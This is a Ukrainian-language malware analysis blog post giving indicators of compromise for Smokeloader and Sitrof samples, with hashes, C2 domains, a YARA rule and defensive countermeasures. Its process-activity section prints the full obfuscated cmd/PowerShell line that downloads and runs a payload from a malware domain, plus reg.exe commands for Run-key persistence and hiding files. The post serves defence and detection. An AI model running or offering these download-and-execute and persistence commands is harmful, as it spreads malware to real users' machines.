IOC_sitrof_smokeldr_230218

Доброго вечора, панове.

До вашої уваги підсумки по сьогоднішнім зразкам.

Отже на аналіз було передано: уже знайомий нам #smokeloader та троян #sitrof (fortis).

Рівень загрози по обом – середній. Для тих, хто уважно читає наші поради – низький в обох випадках.

 

Трохи аналітики:

#smokeloader

 

  • Враховуючи почерк цієї команди слід очікувати нових зразків із цим посиланням
  • Схема не змінилася – обфусковані JS скрипти в архіві
  • Скрипт чітко вказує адресу та ім’я, під яким payload записується на диск
  • Завантаження основної частини засобами Powershell
  • Не потребує прав Адміністратора
  • Цього разу змінили домен та застосували обфускацію команд при передачі

#sitrof

  • Цей штам дуже мало застосовувався
  • Повторний запуск = новий клон (розмір*2, інше ім’я, мімікрія під системні файли) – цей модуль взяли у #zbot
  • Чітка атрибутика (завдяки Techhelplist) по User Agent (POST /ftsri.php?reg)
  • Не потребує прав Адміністратора
  • Пристосований до збору інформації
  • Говорити про нього як про інструмент складної атаки не варто, це швидше розвідка за допомогою нетипового семплу
  • Проте він досить “незграбний” і створює багато артефактів, тому схиляюсь до думки що це потяг до екзотики, а не прояв майстерності
  • Вносить зміни в реєстр щоб приховати своє тіло (старий трюк)

 

Схема атаки:

 

#smokeloader

 

email > Attach (RAR) > JS > WSCRIPT > CMD > Powershell > single hardcoded URL >

'h11p:\ vivedoc{.} ru/document/pax.exe' >  $env:temp + '\1004.exe

* (минулого разу – enterwords{.} ru/uadoc/crsse.exe > 11054.exe, до того - 63753.exe, а ще раніше 5541.exe)

 

#sitrof

Вектор доставки не підтверджено.

 

Маркери IOC:

 

#smokeloader

Приєднання (архів):

SHA-256            843f898ca145f00e643019c64376491882431fbbc4f187cd6e011050375c6829
File name            рахунок фактура 21.02.2018р.rar
File size              85.71 KB

 

скрипт приманка:

SHA-256            3010c97b0589cc954574e209f93cf4499e64cf812fb12b37e1aec7b0e4ffbedd
File name           рах.фак. 75-КТ.xls.js
File size              33.47 KB

основна частина:

SHA-256            e67bc39af0cd4e5bf5d346927c06c2af2d9209d794ad98c9387d797b914f3423
File name           pax.exe >> $env:temp + '\1004.exe
File size              345 KB

 

#sitrof

основна частина:

SHA-256            59ab6cb69712d82f3e13973ecc7e7d2060914cea6238d338203a69bac95fd96c
File name           System Volume Information.exe
File size              41.56 KB

Наступні ітерації запуску:

>2га
SHA-256    21a25b82388ff6794dcfecf238d035c6f71cfd7a453f1123c4f3bd01b0425df6
File name   mstray.exe
File size    83.13 KB

>3тя
SHA-256        af4d350c56c49fe3353d3ccb9fd10507e8ac35ccced7a90abd66d12b06447275
File name   ftshost.exe
File size    166.26 KB

>4та
SHA-256        86dd5923f69f8530c7cb7107dcca0b5518fcf7cb249da19551a2f963d40e63be
File name   mshost.exe
File size    332.52 KB

>5та
SHA-256    5b2740e47f7dace861e9e6619936fbaeb93a3834ee19f7bfc4f979cdb12cdf69
File name   mssvc.exe
File size    665.04 KB

 

Мережеві IOC:

 

#smokeloader

 

завантаження payload – досі активна!

104.18.59.143    vivedoc{.} ru      GET /document/pax.exe HTTP/1.1
(минулого разу -  92.63.197.13      enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1)

 

трафік скомпрометованої системи – сервер контролю (так само як і минулого разу)

92.63.197.13      honeyindoc{.} ru POST / HTTP/1.1  (application/x-www-form-urlencoded)

 

#sitrof

c2 :

yourssagregator{.} comlu{.} com/ftsri.php
allnewsmedia{.} webatu{.} com/ftsri.php

 

Передача зібраної інформації (система, користувач, CPU)

153.92.0.100      HTTP 346   lovecatalog{.} comlu{.} com POST /ftsri.php?reg&ver=4.100000&comp=agent&addinfo=test@agent;%202%20x86%20"Intel"%20processor(s) HTTP/1.1
153.92.0.100      HTTP 215   yourssagregator{.} comlu{.} com  POST /ftsri.php?get&version HTTP/1.1
153.92.0.100      HTTP 244   yourssagregator{.} comlu{.} com  GET /ftsri.php?get&module=\023=K6\263\023;W\03#JEB HTTP/1.1

 

Трафік скомпрометованої системи

mshost.exe1600               TCP        153.92.0.100       80           CLOSE_WAIT                                                                                                                     
mshost.exe1600               TCP        153.92.0.100       80           CLOSE_WAIT                                                                                                                                     
mshost.exe1600               TCP        104.20.67.46       443         CLOSE_WAIT

 

Активність по процесам:

 

#smokeloader

 

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

Ліричний відступ, нагадую, що ENS обладнано сигнатруами для блокування певних команд Powershell

Їх просто потрібно активувати:

На відміну від минулого разу застосували ще сильнішу обфускацію команд

 

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\рах.фак. 75-КТ.xls.js"

"C:\Windows\System32\cmd.exe" /k set _a111=powe&& set _a222=rsh&& set _a333=ell&& call %_a111%%_a222%%_a333% $CsbSHQUu = 'GyxDSwG';$a = 'Msxml' + '2.XML' + 'HTTP';$z5iLQa8 = 'pIPBA';$b = 'ADO' + 'DB.' + 'Stream';$kacCc = 'mEKyiYy1';$c = 'G' + 'E' + 'T';$JnheMsVo = 'SHblsw';$d = 1 - 1 + 1;$pDhstfie = 'zwqEzO';$hr = New-Object -ComObject $a;$ddbeu = 'KfHL80';$ab = New-Object -ComObject $b;$jUi2Pmko = 'GNbYLYU';$path = $env:temp + '\1004.exe';$Nn8NG = 'ISrrb';$hr.open($c, 'http://vivedoc{.} ru/document/pax.exe', 0);$FbWdaAPm = 'MuwGl';$hr.send();$tkzNp = 'aummFLV';$NWHLjOHp = 'TXzrW';$hryQYP = 'NipavHP';$otGXcz = 'YxEi0';$ab.open();$leJkI = 'b7CaDKAEf';$ab.type = $d;$XhzVqK = 'uG0QddHO';$ab.write($hr.responseBody);$RZAQmIf3 = 'xckwyBI';$ab.savetofile($path);$zGsspdDz = 'rZ4chUv';$ab.close();$zyOHSXL = 'PyCybbp';$cOo8LIl = 'C7ms3yUc';$Cexglw = 'YI128';$ankqLgZP = 'TKwSsN';$DgphQkeP = 'orASsm';$cwndO = 'cJPoPB';$bXBnK = 'HzkFOlL';Start-Process $path;

powershell  $CsbSHQUu = 'GyxDSwG';$a = 'Msxml' + '2.XML' + 'HTTP';$z5iLQa8 = 'pIPBA';$b = 'ADO' + 'DB.' + 'Stream';$kacCc = 'mEKyiYy1';$c = 'G' + 'E' + 'T';$JnheMsVo = 'SHblsw';$d = 1 - 1 + 1;$pDhstfie = 'zwqEzO';$hr = New-Object -ComObject $a;$ddbeu = 'KfHL80';$ab = New-Object -ComObject $b;$jUi2Pmko = 'GNbYLYU';$path = $env:temp + '\1004.exe';$Nn8NG = 'ISrrb';$hr.open($c, 'http://vivedoc{.} ru/document/pax.exe', 0);$FbWdaAPm = 'MuwGl';$hr.send();$tkzNp = 'aummFLV';$NWHLjOHp = 'TXzrW';$hryQYP = 'NipavHP';$otGXcz = 'YxEi0';$ab.open();$leJkI = 'b7CaDKAEf';$ab.type = $d;$XhzVqK = 'uG0QddHO';$ab.write($hr.responseBody);$RZAQmIf3 = 'xckwyBI';$ab.savetofile($path);$zGsspdDz = 'rZ4chUv';$ab.close();$zyOHSXL = 'PyCybbp';$cOo8LIl = 'C7ms3yUc';$Cexglw = 'YI128';$ankqLgZP = 'TKwSsN';$DgphQkeP = 'orASsm';$cwndO = 'cJPoPB';$bXBnK = 'HzkFOlL';Start-Process $path;

"C:\tmp\1004.exe"

 

Закріплення через HCU (так само як і минулого разу)

 

Policies                      c:\users\operator\appdata\roaming\microsoft\tjerrirf\rtdiubth.exe           
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf
HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run

 

#sitrof

Після запуску дублює своє тіло у довільний підкаталог operator\AppData\Roaming\Microsoft\*\ (SDL, DLL, etc)

Свою копію додає до списку автозавантаження

Ліричний відступ, нагадую, що ENS обладнано вбудованим правило для блокування такої активності

Просто активуйте правило:

 

"C:\Users\operator\Desktop\System Volume Information.exe"
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v mqkldrv /t REG_SZ /d "C:\Users\operator\AppData\Roaming\Microsoft\bin\mshost.exe" /f


"C:\Users\operator\AppData\Roaming\Microsoft\bin\mshost.exe"
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v mqkldrv /t REG_SZ /d "C:\Users\operator\AppData\Roaming\Microsoft\bin\mshost.exe" /f
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0x00000000 /f
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 0x00000001 /f

 

Закріплення

mqkldrv                     c:\users\operator\appdata\roaming\microsoft\bin\mshost.exe        02.09.2007 13:34

McAfee

YARA (c) @ Techhelplistcom

 

rule sitrof_fortis {

meta:
author = ” J from THL <j@techhelplist.com>”
date = “2018/23”
reference = “https://www.virustotal.com/#/file/59ab6cb69712d82f3e13973ecc7e7d2060914cea6238d338203a69bac95fd96c/community&#8221;
version = 1
maltype = “Stealer”
filetype = “memory”

strings:

$a = “?get&version”
$b = “?reg&ver=”
$c = “?get&exe”
$d = “?get&download”
$e = “?get&module”
$f = “&ver=”
$g = “&comp=”
$h = “&addinfo=”
$i = “%s@%s; %s %s \”%s\” processor(s)”
$j = “User-Agent: fortis”

condition:
6 of them
}

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • (#sitrof) YARA правило для визначення активності – дякую Techhelplist
  • (#sitrof) Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • (#smokeloader) Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
  • (#smokeloader) Деактивація механізму Windows Script Host (варіант 2й)
  • (#smokeloader) Якщо ж Powershell активно застосовується – нагадую про вбудовані можливості McAfee ENS – сигнатури Exploit Prevention
  • (обидва зразки) Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • (#smokeloader) Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

Tags: , , , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: